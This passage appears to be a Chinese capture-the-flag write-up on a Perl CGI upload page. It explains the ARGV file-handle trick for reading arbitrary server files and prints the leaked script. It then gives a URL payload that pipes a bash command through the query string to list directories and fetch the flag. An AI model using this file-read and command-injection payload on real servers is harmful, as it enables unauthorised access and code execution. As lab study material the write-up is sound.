點擊Files,這裏會把上傳的文件的內容在下方輸出,猜測後臺邏輯:
use strict;
use warnings;
use CGI;
my $cgi= CGI->new;
if ( $cgi->upload( 'file' ) ) {
my $file= $cgi->param( 'file' );
while ( <$file> ) { print "$_"; }
}
param()函數會返回一個列表的文件但是隻有第一個文件會被放入到下面的file變量中。如果我們傳入一個ARGV的文件,那麼Perl會將傳入的參數作爲文件名讀出來。對正常的上傳文件進行修改,可以達到讀取任意文件的目的:
這裏根據網址猜測file.pl位於/var/www/cgi-bin/目錄下,返回結果如下:
#!/usr/bin/perl
<br />
<br />use strict;
<br />use warnings;
<br />use CGI;
<br />
<br />my $cgi = CGI->new;
<br />
<br />print $cgi->header;
<br />
<br />print << "EndOfHTML";
<br /><!DOCTYPE html
<br /> PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
<br /> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
<br />>
<br /><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<br /> <head>
<br /> <title>Perl File Upload</title>
<br /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<br /> </head>
<br /> <body>
<br /> <h1>Perl File Upload</h1>
<br /> <form method="post" enctype="multipart/form-data">
<br /> File: <input type="file" name="file" />
<br /> <input type="submit" name="Submit!" value="Submit!" />
<br /> </form>
<br /> <hr />
<br />EndOfHTML
<br />
<br />if ($cgi->upload('file')) {
<br /> my $file = $cgi->param('file');
<br /> while (<$file>) {
<br /> print "$_";
<br /> print "<br />";
<br /> }
<br />}
<br />
<br />print '</body></html>';
<br /></body></html>
基本上和推測的一致.接着我們利用bash來讀取:
/cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/|
返回結果如下:
接下來按照上述方法讀取flag即可.